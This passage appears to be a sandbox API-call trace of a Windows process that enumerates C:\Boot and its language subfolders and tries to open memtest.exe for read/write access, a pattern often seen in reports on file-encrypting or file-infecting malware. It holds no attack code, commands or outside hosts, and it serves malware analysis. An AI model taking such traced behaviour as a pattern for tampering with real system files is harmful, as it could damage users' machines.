[0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.979] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfc) returned 0x99dea38 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef888 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef130 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef4c8 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1a8 [0092.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efab8 | out: hHeap=0x680000) returned 1 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef388 | out: hHeap=0x680000) returned 1 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef040 | out: hHeap=0x680000) returned 1 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0092.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.980] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.980] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.980] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16c) returned 0x6edd00 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef040 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef388 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efab8 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef8d8 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef248 [0092.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa90 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef888 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef130 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef4c8 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1a8 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0092.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.981] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.981] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa334c6e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa334c6e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.981] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.981] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.981] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0092.981] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0092.981] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0092.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x214) returned 0x31bc228 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1a8 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef4c8 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef130 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef888 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef518 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef810 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef8b0 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef770 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3d8 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef040 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef388 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efab8 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef8d8 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef248 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa90 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6edd00 | out: hHeap=0x680000) returned 1 [0092.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.982] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33989a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33989a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0092.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.983] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0092.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.983] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0092.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.983] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa340adc0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa340adc0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa90 [0092.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.983] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3430f20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3430f20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef248 [0092.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.983] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3457080, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x310) returned 0x31beb38 [0092.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef8d8 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efab8 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef388 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef040 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa68 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efbd0 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efb58 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef5e0 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefa0 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef838 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef6a8 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee10 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efb80 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef748 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef068 [0092.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef658 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1a8 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef4c8 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef130 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef888 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef518 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef810 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef8b0 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef770 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3d8 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: 